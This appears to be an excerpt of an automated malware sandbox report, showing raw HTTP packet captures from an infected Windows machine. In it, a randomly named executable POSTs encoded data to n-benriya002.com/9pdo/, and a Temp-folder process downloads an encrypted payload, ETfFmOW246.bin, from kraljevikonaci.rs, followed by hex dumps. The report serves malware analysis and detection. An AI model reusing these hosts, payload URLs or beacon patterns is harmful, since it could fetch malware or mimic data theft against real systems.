                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.jt-berger.store
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Apr 25, 2024 19:26:14.232901096 CEST745INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Content-Length: 601
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:14 GMT
                                                                      Server: Apache
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.1049712219.94.128.41805852C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 25, 2024 19:26:20.373632908 CEST744OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 195
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.n-benriya002.com
                                                                      Origin: http://www.n-benriya002.com
                                                                      Referer: http://www.n-benriya002.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 55 30 36 6c 49 56 3d 63 47 73 48 6e 68 4f 72 2f 58 45 64 2b 51 78 6f 49 48 63 44 47 70 2b 64 77 76 57 58 4b 6c 55 4e 31 34 44 50 59 34 46 48 47 32 59 78 50 47 73 74 4f 41 71 36 67 55 52 34 66 5a 51 77 39 31 6b 6a 62 2f 38 55 37 4d 46 7a 4d 48 52 67 78 75 44 41 50 4e 6b 6f 2f 66 69 61 2b 6d 4a 48 56 72 58 67 50 4d 4e 76 53 44 55 2b 78 39 35 61 58 47 71 43 52 6c 77 37 33 70 6b 59 6c 51 33 76 45 66 43 77 46 31 70 30 6a 69 43 62 59 38 72 67 36 2b 39 61 6d 41 30 67 58 55 55 42 37 2f 4f 37 79 62 6d 55 4e 6e 6d 2f 36 74 57 57 61 77 59 63 34 39 78 69 30 61 6f 31 77 69 4f 7a 71 72 7a 6f
                                                                      Data Ascii: U06lIV=cGsHnhOr/XEd+QxoIHcDGp+dwvWXKlUN14DPY4FHG2YxPGstOAq6gUR4fZQw91kjb/8U7MFzMHRgxuDAPNko/fia+mJHVrXgPMNvSDU+x95aXGqCRlw73pkYlQ3vEfCwF1p0jiCbY8rg6+9amA0gXUUB7/O7ybmUNnm/6tWWawYc49xi0ao1wiOzqrzo
                                                                      Apr 25, 2024 19:26:20.767047882 CEST1289INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 25 Apr 2024 17:26:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"
                                                                      Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 28 41 49 4f 53 45 4f 29 20 34 2e 35 2e 33 2e 31 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a
                                                                      Data Ascii: 5f9d<!doctype html><html dir="ltr" lang="ja" prefix="og: https://ogp.me/ns#"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="HandheldFriendly" content="True"><meta name="MobileOptimized" content="320"><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="pingback" href="http://n-benriya002.com/xmlrpc.php">...[if IE]><![endif]--><link rel="stylesheet" href="http://n-benriya002.com/wp-content/themes/jstork/n-factory-css/footer.css" type="text/css" media="screen"><link rel="stylesheet" href="http://n-benriya002.com/wp-content/themes/jstork/n-factory-css/page.css" type="text/css" media="screen">... All in One SEO 4.5.3.1 - aioseo.com --><title> | </title><meta name="robots" content="noindex" /><meta name="generator" content="All in One SEO (AIOSEO) 4.5.3.1" /><script type="application/ld+j
                                                                      Apr 25, 2024 19:26:20.767074108 CEST1289INData Raw: 73 6f 6e 22 20 63 6c 61 73 73 3d 22 61 69 6f 73 65 6f 2d 73 63 68 65 6d 61 22 3e 0a 09 09 09 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70
                                                                      Data Ascii: son" class="aioseo-schema">{"@context":"https:\/\/schema.org","@graph":[{"@type":"BreadcrumbList","@id":"https:\/\/n-benriya002.com\/9pdo\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/n-benriya002.com\/#listItem
                                                                      Apr 25, 2024 19:26:20.767086983 CEST1289INData Raw: 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 5c 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 7d 5d 7d 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 21 2d 2d 20
                                                                      Data Ascii: lisher":{"@id":"https:\/\/n-benriya002.com\/#organization"}}]}</script>... All in One SEO --><link rel='dns-prefetch' href='//n-benriya002.com' /><link rel='dns-prefetch' href='//ajax.googleapis.com' /><link rel='dns-prefetch' href=
                                                                      Apr 25, 2024 19:26:20.767157078 CEST1289INData Raw: 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e
                                                                      Data Ascii: data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n
                                                                      Apr 25, 2024 19:26:20.767194986 CEST1289INData Raw: 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65
                                                                      Data Ascii: ew Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e
                                                                      Apr 25, 2024 19:26:20.767293930 CEST1289INData Raw: 74 69 6e 67 73 29 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27
                                                                      Data Ascii: tings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !im
                                                                      Apr 25, 2024 19:26:20.767318010 CEST1289INData Raw: 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d
                                                                      Data Ascii: r--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cya
                                                                      Apr 25, 2024 19:26:20.767393112 CEST1289INData Raw: 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29
                                                                      Data Ascii: radient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset-
                                                                      Apr 25, 2024 19:26:20.767798901 CEST1289INData Raw: 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20
                                                                      Data Ascii: inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-lay
                                                                      Apr 25, 2024 19:26:20.767815113 CEST1289INData Raw: 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c
                                                                      Data Ascii: color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-p
                                                                      Apr 25, 2024 19:26:21.037709951 CEST1289INData Raw: 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d
                                                                      Data Ascii: olor{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--pr


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.1049706195.252.110.2534437376C:\Users\user\AppData\Local\Temp\Overfondle.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-25 17:25:24 UTC176OUTGET /ETfFmOW246.bin HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: kraljevikonaci.rs
                                                                      Cache-Control: no-cache
                                                                      2024-04-25 17:25:25 UTC502INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Thu, 25 Apr 2024 17:25:25 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 270400
                                                                      Connection: close
                                                                      Last-Modified: Tue, 23 Apr 2024 12:41:16 GMT
                                                                      Cache-Control: max-age=2592000
                                                                      Expires: Sat, 25 May 2024 17:25:25 GMT
                                                                      Vary: Accept-Encoding
                                                                      X-Proxy-Cache: BYPASS
                                                                      Set-Cookie: uid=w/xu/WYqkgWkFxsUA/W+Ag==; expires=Sat, 25-May-24 17:25:25 GMT; domain=$host; path=/
                                                                      P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
                                                                      Accept-Ranges: bytes
                                                                      2024-04-25 17:25:25 UTC14858INData Raw: ee 99 98 4b 7f 80 03 71 94 cf 8c e3 af f4 73 cc f9 20 ae 70 9f c1 b1 16 2b c9 f4 06 c5 04 36 f4 c2 3f ec 24 e2 0a 82 b7 6f e0 13 bc 33 24 f2 77 93 2f 07 f0 cd 02 71 62 10 21 d5 c2 67 03 1b 79 f9 87 a9 3e f8 30 74 2f e2 f3 00 3d d6 f2 9a f3 53 5f b4 fc ea a5 fc f8 6a 47 34 08 87 9b 91 b1 cc 72 0e e6 ea 6c 35 23 a1 f7 6e 9b 57 ac 4e c9 f9 42 89 f7 39 c0 47 b3 6b dd 62 bd 0c a4 81 f7 22 d9 a0 a2 a9 e5 58 64 9d 33 ab 3e 91 59 0e fb 07 b4 62 b1 df 3d 06 c1 fb ea b7 b9 77 b6 92 03 fe 14 29 92 ba 55 ca 4d 09 82 eb c3 8a 72 99 a8 8b ca 65 7f f8 aa a7 c0 91 b0 c3 60 d3 1f 70 76 5f 14 b7 d7 92 89 fe 57 0a 73 f8 45 ba 58 c0 4c 37 5a 8b d7 77 98 1b a8 11 6c 7b f9 00 38 48 4d ad 59 bd 1c 63 b9 1a 55 37 19 6b 02 96 06 0b 0e 49 ed c1 11 22 6e 1c d6 a0 e6 c6 2c 55 1b 43
                                                                      Data Ascii: Kqs p+6?$o3$w/qb!gy>0t/=S_jG4rl5#nWNB9Gkb"Xd3>Yb=w)UMre`pv_WsEXL7Zwl{8HMYcU7kI"n,UC
                                                                      2024-04-25 17:25:25 UTC1024INData Raw: d5 74 7d fe 65 d2 1e 44 51 01 77 de 69 b3 f9 4d 32 29 62 87 ae 56 db 4a 56 5e 23 2e 15 b4 cb 29 86 1f 37 63 44 0a cd 50 f0 5b 1c 29 5d 7b fa 3d 04 ee 39 1e 12 97 6f c9 04 b8 67 a1 1c 25 73 d4 a6 2c 14 46 3b 28 b4 2f af 93 e6 62 bb 66 23 3e 82 bd ed 44 4e 13 56 3a 3c 78 5a 3c 57 8a 68 95 47 c3 1c ea 17 4a 27 ee c6 ef 57 55 63 b9 9f 70 06 6c 77 50 9b 71 c4 8f b6 65 0b 73 80 af a1 ed 78 3c bf 2d b5 48 b9 ed f3 68 cb 05 be f1 b4 e1 2d f8 17 91 9b ca b4 cf 3a 64 58 6f ac 45 11 f9 83 ee 80 8d e7 c8 6f 20 14 5e 85 74 b7 bf e4 39 b4 ad 84 11 ae 18 f0 45 b3 92 69 dc 36 7a 8a d9 4c 15 4b 19 72 06 6c 7c 44 23 4d 67 7f c1 b7 74 21 f7 9c d7 ff e8 1a 74 1c e7 ba 4c f2 75 d4 b9 52 0f 52 a7 06 ed 04 33 49 a4 bc 9d b0 25 d9 8e 7b 15 ca 40 fc 7b 7e 82 1a 8e bd bd d2 6a c3
                                                                      Data Ascii: t}eDQwiM2)bVJV^#.)7cDP[)]{=9og%s,F;(/bf#>DNV:<xZ<WhGJ'WUcplwPqesx<-Hh-:dXoEo ^t9Ei6zLKrl|D#Mgt!tLuRR3I%{@{~j
                                                                      2024-04-25 17:25:25 UTC16384INData Raw: 6f e6 e7 12 78 64 bf da d7 c3 3f ea d3 2c b1 ab 48 bd 9e 79 c2 43 37 b1 57 db cb af 00 3a 39 4d 48 bd a2 19 2b 16 3e 7c ce 32 39 36 b5 6d 6f f3 95 09 25 90 41 16 68 88 93 b3 9e 27 f0 71 3b 46 49 89 04 4a 43 a7 10 c7 bd 2b da f7 65 82 20 46 a0 43 45 99 13 e8 72 ba 8c 3f bc 8d 71 d5 fb eb 1c 91 ea bd fc 66 99 78 4d 1c 11 3a 2a a2 f4 b4 fb 6b b5 36 25 8a ef 0b ea 54 d7 08 54 6f 3c d9 9e f1 d9 90 fc 73 e5 90 a4 3f 7b dc 9e 44 57 9a 65 2b bf 57 c2 63 22 c2 80 d9 e3 2a e9 4f d4 7b cc 64 27 a7 9d 6a ca 7c de 87 1d 6e af 28 b7 36 7a e9 c5 48 9c 6c 35 f3 1b 3d c4 fe 92 79 7f 4f f5 2c 70 ec b6 13 81 6f 28 37 fd eb f5 1d d4 3d 12 0a 66 d9 c5 4b ab e1 32 29 1d 32 f0 c9 c9 60 2b e9 40 b4 09 0c dc 08 e3 01 29 96 b4 0a 31 c8 1b 18 7c a8 f6 f0 26 04 97 3f b8 68 3c 51 b1
                                                                      Data Ascii: oxd?,HyC7W:9MH+>|296mo%Ah'q;FIJC+e FCEr?qfxM:*k6%TTo<s?{DWe+Wc"*O{d'j|n(6zHl5=yO,po(7=fK2)2`+@)1|&?h<Q
                                                                      2024-04-25 17:25:25 UTC16384INData Raw: 88 a4 67 6f ba 11 d2 bd 58 aa 93 d2 cc b8 c1 a3 a6 ad ba ac 76 38 ae f2 8d 6b ab ce 1b 4b 13 0d 47 d8 68 68 f5 ac e9 09 71 cb d1 a5 99 eb 22 7a 75 f1 49 d8 81 1e 8c 05 50 97 04 4d 31 12 a4 04 61 0d e2 25 30 07 07 0d 10 a4 f0 a5 2b e7 35 72 ba ae cb 57 78 41 2e 32 81 b6 89 c2 b5 ef 0d ba 25 ce c9 db 99 b3 1c 82 96 f7 36 97 11 a6 2d d6 48 06 87 b7 1b c3 7a 20 95 9d 7e f1 3b 7c ef 43 15 fa 5a 08 71 4f 30 4a 7e 04 ea 34 5e 86 d8 3e 65 26 bf 4e 35 79 d9 a9 72 49 1a d3 e2 c6 b2 e4 74 92 ac db 69 b2 b6 ff f9 2a 2d 7c af 9a 07 1b 6c 4c 48 6d e1 a8 e9 12 e0 0e b3 b3 26 7a 2d 35 7c a4 13 1d 13 6e de 3c 41 27 bc 4b dc 68 14 36 49 86 fb cf e9 9a ef 66 84 f1 87 fe a6 fc ba bb d0 97 22 25 f0 02 f3 54 29 8d 2f 51 0c 1b 46 c4 ff 81 8f 69 3c 89 f4 2d b1 67 4c 8b a4 0d 9d
                                                                      Data Ascii: goXv8kKGhhq"zuIPM1a%0+5rWxA.2%6-Hz ~;|CZqO0J~4^>e&N5yrIti*-|lLHm&z-5|n<A'Kh6If"%T)/QFi<-gL
                                                                      2024-04-25 17:25:25 UTC16384INData Raw: ff ae 34 95 6a 44 e2 77 d7 c8 29 47 5f 7e a7 02 dd 5c d0 0e 00 64 8a 20 41 a4 1d ff 46 e4 0b 11 e6 bf 3e 51 b4 ad cc dc fe ee 99 09 df 1f 3a ac 35 29 84 53 4b 2a 23 66 8f 09 aa 39 84 a1 16 24 e3 09 52 88 de e9 2c 7a c3 f6 35 ca ec 29 e5 92 fd 44 0d 9c d1 6b 8f cb 48 a9 1e 01 da 10 ee 4e d8 06 2c 11 5a 5b 7f 46 67 32 96 0d 6b 11 ca 1e 56 82 36 2f b6 f7 f5 6b 48 35 7f c3 7b b0 50 51 ae 10 ad 13 c6 42 b5 d5 2e 65 40 ad 05 a3 28 69 0f f8 5b 92 8d d5 0b 7e dd cc 45 23 cc e3 5d 9b 34 b9 be 3f 1b 8d 85 63 35 b4 73 d6 78 58 38 18 96 e2 6b 50 f9 63 ac 2f 34 54 7c a7 f7 e1 a9 78 86 ae ba 5e 54 6d 4c de 95 fd 36 04 1e 4b 9d e7 b2 b6 05 37 d8 80 42 2b 2d 71 ad 55 de b0 b3 bf de 88 55 2e 53 90 42 8e 54 a0 a9 95 e0 8f 09 8b dc 02 01 3c 38 3f 94 8b 0f 7f 54 35 e2 9c 3b
                                                                      Data Ascii: 4jDw)G_~\d AF>Q:5)SK*#f9$R,z5)DkHN,Z[Fg2kV6/kH5{PQB.e@(i[~E#]4?c5sxX8kPc/4T|x^TmL6K7B+-qUU.SBT<8?T5;
                                                                      2024-04-25 17:25:25 UTC16384INData Raw: 6d 26 09 4c b1 f7 56 23 fd ad b1 a1 8c 9c 0a cc 98 8d 50 f4 7d ca 69 17 81 15 bc cc 2a 3a f8 46 0a 59 9e 3f d0 7c c0 a5 48 ff 3a 74 d1 65 56 a9 2c 2e 27 12 a3 67 03 f4 4a 43 57 4c 67 69 69 1f 96 9d 4a 13 12 c3 72 75 bb f8 6b 01 e9 88 5b bf a4 2d 26 f1 00 ed 1c 6a a8 93 6a ed 3b 05 31 6a f5 14 21 1a b7 64 0b e5 f9 e7 f2 26 b7 ad ca 97 24 4b a3 81 d5 a7 43 21 21 bb 33 82 a9 1a 38 31 c0 f2 36 6a 88 9e 91 9a 07 47 5f 96 1f c3 6b 77 4d a2 15 cc 92 b1 c3 7c 1b fd 7f 1c ce cf 8b 04 3b a7 9f d8 ad a7 2b 07 40 18 a8 a6 ef 8c ac b3 70 a8 ca 7c 8d 35 5e 50 0c 9a bc a7 79 b9 84 2f d7 3b e7 fd 06 1f ef cf aa 9f 2f 84 80 90 c8 dc 16 c4 ed c3 25 16 08 af 85 7b 95 3c 29 1b 65 ea bb d5 49 15 5d 3a e4 8a 40 75 39 d6 93 dc 1e 23 69 70 ad 95 fe f6 92 aa d9 4b db 11 38 76 d4
